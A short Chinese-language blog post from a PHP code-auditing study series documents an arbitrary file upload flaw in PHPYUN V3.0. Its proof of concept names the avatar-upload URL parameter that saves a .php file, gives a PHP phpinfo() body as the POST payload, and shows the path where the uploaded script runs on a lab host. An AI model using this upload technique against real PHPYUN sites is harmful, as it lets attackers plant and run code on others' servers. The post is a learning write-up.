米安程式碼審計 06 PHPYUN V3.0 任意檔案上傳漏洞

青蛙愛輪滑發表於2018-07-24

本文記錄 PHP 程式碼審計的學習過程,教程為暗月 2015 版的 PHP 程式碼審計課程

PHP 程式碼審計部落格目錄

1. 簡介

web環境: phpstudy apache+php5.2

程式版本:phpyun3.0 2013-11-02

2. 測試

首先註冊一個會員 然後訪問

http://192.168.171.128/member/index.php?XDEBUG_SESSION_START=netbeans-xdebug&M=index&C=save_avatar&type=small&photoId=1.php

POST:

<?php phpinfo(); ?>

在這裡插入圖片描述

構造檔案上傳成功 我們訪問下

http://192.168.171.128/upload/user/user_small/1.php

在這裡插入圖片描述

相關文章